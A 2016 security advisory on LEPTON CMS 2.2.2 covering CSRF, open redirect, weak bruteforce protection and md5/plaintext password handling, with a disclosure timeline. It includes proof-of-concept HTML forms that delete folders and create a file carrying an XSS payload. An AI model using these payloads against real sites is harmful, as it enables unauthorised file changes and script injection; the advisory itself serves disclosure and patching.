Lepton 2.2.2: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling

Lepton 2.2.2: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling

Date: 2016-11-10 10:46:26
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: LEPTON 2.2.2 stable
Fixed in: 2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website: http://www.lepton-cms.org/
Vulnerability Type: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it contains various low to medium impact issues. The functionality that operates on files and folders is vulnerable to CSRF which may lead to XSS, the logout is vulnerable to Open Redirect, the in-build bruteforce protection can be easily bypassed, and passwords are hashed with md5 and send out via email in plaintext.

3. Details


CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P

Description: All actions on folders and files are missing CSRF protection. Because of this, an attacker can delete, create, or rename folders and files. An attacker could for example create .html files which would lead to an XSS attack.

Proof of Concept:

Delete Folder: <html> <body> <form action="http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?action=delete_folder" method="POST"> <input type="hidden" name="path" value="test>" /> <input type="hidden" name="name" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> Create File: <html> <body> <form action="http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?action=create_file" method="POST"> <input type="hidden" name="path" value="" /> <input type="hidden" name="name" value="test.html" /> <input type="hidden" name="new_content" value="<img src=no onerror=alert(1)>" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Open Redirect

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:NP

Description: The redirect parameter of the logout script is vulnerable to open redirect.

Proof of Concept:


Insufficient Bruteforce Protection

Description: The bruteforce protection works on a per-session base, which is easily bypassed by an attacker by simply requesting a new session by not sending the current, locked session information. The current bruteforce protection may provide a false sense of security and should thus be removed or changed.


if($_SESSION['ATTEMPS'] > $this->max_attemps) { $this->warn(); }

Password Handling

The password reset functionality sends a newly generated password in plaintext via email, which is not recommended.

Additionally, md5 is used for hashing, which is also not recommended.

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:


Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public